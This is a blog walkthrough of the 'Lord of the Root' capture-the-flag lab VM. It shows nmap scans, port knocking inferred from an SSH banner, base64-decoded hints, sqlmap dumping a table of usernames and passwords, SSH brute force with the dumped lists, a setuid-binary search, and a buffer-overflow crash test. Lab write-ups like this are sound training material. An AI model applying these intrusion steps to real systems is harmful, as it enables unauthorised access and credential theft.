Saturday, 13 February 2016

Lord of the root challenge

Today I would like to present Lord of the root walkthrough :-)

Port scanning
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
Hmm only 22 is open, so let's try connect via SSH... We have got following banner
Easy as 1,2,3
root@'s password:
For me, it is hint - port knocking 1,2,3. Let's examine the idea.
root@osboxes:~# nmap -p-

Starting Nmap 6.47 ( ) at 2016-02-13 11:54 GMT
Nmap scan report for
Host is up (0.0014s latency).
Not shown: 65533 filtered ports
22/tcp   open  ssh
1337/tcp open  waste

MAC Address: 00:0C:29:75:18:08 (VMware)
That's looks good, a little more information
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Heh so funny :-) I examined source code and I found that the picture has assigned URL /images/iwilldoit.jpg. Perhaps we can display /robots.txt? Bingo!
Hmm a little strange, because I have got some picture. Maybe in source code will be these information which we are looking for.
<img src="/images/hipster.jpg" align="middle">
Hmmm probably we should decode the string via base64 decoder.
root@osboxes:~# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
We are on a good way :-)
root@osboxes:~# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d

You think about SQLi? Unfortunately manual payload does not work. Maybe sqlmap will be powerful in this case?
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp
 The Webapp database may contain credentials.
[1 table]
| Users |
And dump
Database: Webapp
Table: Users
[5 entries]
| id | username | password         |
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
Good! I have logged in to the application, using frodo's credrntials.

 Hmmm in general nothing useful. So, I add usernames from above dump to the users.txt file and password to the pass.txt file. I executed brute force attack against SSH port and I have got
[22][ssh] host:   login: smeagol   password: MyPreciousR00t
Let's try:

Excellent! We have limited shell :-)
Following command gives us a right way
smeagol@LordOfTheRoot:/var/www/978345210$ find / -perm -4000 -type f
Hm, it looks interesting, ins't it? I have chosen door2 randomly
smeagol@LordOfTheRoot:/SECRET/door2$ ls
smeagol@LordOfTheRoot:/SECRET/door2$ file file
file: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped
In each doors we have the same file. We can see "setuid ELF 32-bit LSB", probably we can try with Buffer Overflow.
smeagol@LordOfTheRoot:/SECRET/door2$ ./file $(python -c "print 'A'*500")
Segmentation fault (core dumped)
So, probably I am right :)
If you don't know how to perform Buffer Overflow via command line, please look at Brain Pa(i)n challenge first.